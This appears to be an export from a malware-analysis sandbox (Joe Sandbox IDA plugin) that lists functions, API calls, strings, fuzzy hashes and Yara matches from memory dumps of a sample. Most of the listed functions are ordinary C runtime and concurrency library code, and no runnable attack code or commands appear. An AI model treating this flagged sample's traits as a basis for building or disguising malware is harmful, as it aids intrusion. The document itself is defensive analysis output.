Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction ID: dfc0e9ab0bee59850993c5f6ec385f4a29eda9a922dcd16b32129501a44d6022
Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction Fuzzy Hash: FA41437190025DAEEB20DF659C85FEA77FCFF05745F0080E6A545A2150DF709E858FA4

Function 0249EEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0249F228,00000004,02497D87,00000004,02498069), ref: 0249EEF9
GetLastError.KERNEL32(?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000,?), ref: 0249EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000), ref: 0249EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0249EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF9D

Strings

advapi32.dll, xrefs: 0249EEF3, 0249EEF8, 0249EF14

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction ID: ae1f1b908bb710a69dc326704798a663ad78eb0d77ed836575b414cbbd08f05a
Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction Fuzzy Hash: 882141B6904611BFEB10AFB49C08E5ABFA8EF05B16F004A2BF555D3650DBBC94418FA4

Function 0249EEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0249F228,00000004,02497D87,00000004,02498069), ref: 0249EEF9
GetLastError.KERNEL32(?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000,?), ref: 0249EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000), ref: 0249EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0249EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF9D

Strings

advapi32.dll, xrefs: 0249EEF3, 0249EEF8, 0249EF14

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction ID: 6bb739f46a4a403fbf10ae7054893b96a74a4733b720baee6ff1b43ea12858a0
Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction Fuzzy Hash: 9A2181B2904711BFEB10AF649C08E5ABFECEF05B16F004A2BF555D3600DBBC94418BA8

Function 024924A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0249670B), ref: 024924B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024924C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024924D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0249670B), ref: 02492500
GetProcAddress.KERNEL32(00000000), ref: 02492507
GetLastError.KERNEL32(?,?,?,0249670B), ref: 02492522
GetLastError.KERNEL32(?,?,?,0249670B), ref: 0249252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492544
__CxxThrowException@8.LIBVCRUNTIME ref: 02492552

Strings

kernel32.dll, xrefs: 024924B0, 024924B5, 024924FA

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction ID: d2f11704ab62b6b290706afb9712ea2c6399a1e213f3ede4b01012700adeb202
Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction Fuzzy Hash: 231186759013117FEB11BB756C5996B7FAC9D45B12710052BB801E2251EBB4D5008A69

Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866

Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
__CxxThrowException@8.LIBVCRUNTIME ref: 00424898
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
__CxxThrowException@8.LIBVCRUNTIME ref: 0042495C

Strings

pContext, xrefs: 00424946
switchState, xrefs: 00424882

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3151764488-2660820399
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798

Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
DuplicateHandle.KERNEL32(00000000), ref: 00419779
SafeRWList.LIBCONCRT ref: 00419798

Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
Part of subcall function 00417767: List.LIBCMT ref: 00417782

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
GetLastError.KERNEL32 ref: 004197B9
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
__CxxThrowException@8.LIBVCRUNTIME ref: 004197DD

Strings

eventObject, xrefs: 004197A2

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1999291547-1680012138
Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D

Function 024A0C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 024A0C36
Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 024A0C9D
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 024A0CBA
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 024A0D20
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 024A0D35
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 024A0D47
Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 024A0D75
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 024A0D80
__CxxThrowException@8.LIBVCRUNTIME ref: 024A0DAC
Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 024A0DBC

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
String ID:
API String ID: 3720063390-0
Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction ID: 10daa1dcfb88a4d8b5ad48e1a0e43cfeaab409df032b99148b1bbd94d4ebfce7
Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction Fuzzy Hash: C741E571A042089BCF19FFA5C4647EE7BA6AF22304F04406FD8465B382CF759A09CF66

Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431DFA

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00431E06
_free.LIBCMT ref: 00431E11
_free.LIBCMT ref: 00431E1C
_free.LIBCMT ref: 00431E27
_free.LIBCMT ref: 00431E32
_free.LIBCMT ref: 00431E3D
_free.LIBCMT ref: 00431E48
_free.LIBCMT ref: 00431E53
_free.LIBCMT ref: 00431E61

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84

Function 024B204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024B2061

Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9

_free.LIBCMT ref: 024B206D
_free.LIBCMT ref: 024B2078
_free.LIBCMT ref: 024B2083
_free.LIBCMT ref: 024B208E
_free.LIBCMT ref: 024B2099
_free.LIBCMT ref: 024B20A4
_free.LIBCMT ref: 024B20AF
_free.LIBCMT ref: 024B20BA
_free.LIBCMT ref: 024B20C8

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 192fda9dc25ff0fe950178ab54c2a0ae022822eee28bf341ce0b93ec51d0ee92
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: DB117775600108AFCB52EF66C841CD93FA6EF04750B5140AABA094F221D771EE60EF60

Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0042E1DE
__cftoe.LIBCMT ref: 0042E210

Strings

F(@, xrefs: 0042E229, 0042E1C0
F(@, xrefs: 0042E25E, 0042E1CC, 0042E261

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: __cftoe
String ID: F(@$F(@
API String ID: 4189289331-2038261262
Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D

Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5

Strings

acos, xrefs: 0043F03D
asin, xrefs: 0043F031
log10, xrefs: 0043EF0F, 0043EF5F
sqrt, xrefs: 0043F049
log, xrefs: 0043EF6B, 0043EF77
exp, xrefs: 0043EF8A, 0043EFEC
pow, xrefs: 0043EFA9, 0043F055, 0043F068

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E

Function 024B3190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction ID: c30e0025f48e379c8364d3ff4673cd5a9d769290eec4118bb3ca1b6504002b8c
Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction Fuzzy Hash: BDC1B274E04245AFDB17DFAAC840BEEBFB5AF09314F04419AE414AB391C7749942CB71

Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004286FB
___except_validate_context_record.LIBVCRUNTIME ref: 00428703
_ValidateLocalCookies.LIBCMT ref: 00428791
__IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
_ValidateLocalCookies.LIBCMT ref: 00428811

Strings

csm, xrefs: 004287A6
fB, xrefs: 004287AE, 004287B7, 004287C8

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 1170836740-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99

Function 00428CBD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
PMDtoOffset.LIBCMT ref: 00428D4F

Strings

Bad dynamic_cast!, xrefs: 00428D91

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9

Function 0249C6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

atomic_compare_exchange.LIBCONCRT ref: 0249C6DC
atomic_compare_exchange.LIBCONCRT ref: 0249C700
std::_Cnd_initX.LIBCPMT ref: 0249C711
std::_Cnd_initX.LIBCPMT ref: 0249C71F

Part of subcall function 02481370: __Mtx_unlock.LIBCPMT ref: 02481377

std::_Cnd_initX.LIBCPMT ref: 0249C72F

Part of subcall function 0249C3EF: __Cnd_broadcast.LIBCPMT ref: 0249C3F6

Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0249C73D

Strings

t#D, xrefs: 0249C6C2

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
String ID: t#D
API String ID: 4258476935-1671555958
Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction ID: 4907e0a9ff6aff853fcbd1f913a4c98d432ceb0e9437733168729e7620dc4747
Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction Fuzzy Hash: 1001F271900605ABDF11FBA2DD84B9EBB6AAF04310F14005BE90597680EBB8AA158F92

Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
__alloca_probe_16.LIBCMT ref: 004321C6
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
__alloca_probe_16.LIBCMT ref: 004322AB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
__freea.LIBCMT ref: 0043231B

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

__freea.LIBCMT ref: 00432324
__freea.LIBCMT ref: 00432349

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698

Function 024B1129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

_free.LIBCMT ref: 024B1444
_free.LIBCMT ref: 024B145D
_free.LIBCMT ref: 024B148F
_free.LIBCMT ref: 024B1498
_free.LIBCMT ref: 024B14A4

Strings

C, xrefs: 024B1291

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction ID: 4bf953046ae8e99d889f96c5396d38a94d44d558edc225a5407ee5812131ea11
Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction Fuzzy Hash: AAB12775A012199BDB26DF29C894BEEB7B5FF08304F1445AAD80DA7350E770AE90CF50

Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439F1D
_free.LIBCMT ref: 00439F2B
_free.LIBCMT ref: 0043A059
_free.LIBCMT ref: 0043A064

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59

Function 024BA115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024BA184
_free.LIBCMT ref: 024BA192
_free.LIBCMT ref: 024BA2C0
_free.LIBCMT ref: 024BA2CB

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction ID: 0b74a76594ba4baed379928a0c5dab0215b6a522704d77e73e38190dbbe0bcf9
Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction Fuzzy Hash: 3E61D171D00215AFDB26CFA9C841BDABBF6EF48710F2441ABE844EB341D771A981CB60

Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
__fassign.LIBCMT ref: 00433940
__fassign.LIBCMT ref: 0043395B
WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69

Function 024B3AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,024AC4A4,E0830C40,?,?,?,?,?,?,024B425F,0248E03C,024AC4A4,?,024AC4A4,024AC4A4,0248E03C), ref: 024B3B2C
__fassign.LIBCMT ref: 024B3BA7
__fassign.LIBCMT ref: 024B3BC2
WideCharToMultiByte.KERNEL32(?,00000000,024AC4A4,00000001,?,00000005,00000000,00000000), ref: 024B3BE8
WriteFile.KERNEL32(?,?,00000000,024B425F,00000000,?,?,?,?,?,?,?,?,?,024B425F,0248E03C), ref: 024B3C07
WriteFile.KERNEL32(?,0248E03C,00000001,024B425F,00000000,?,?,?,?,?,?,?,?,?,024B425F,0248E03C), ref: 024B3C40

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
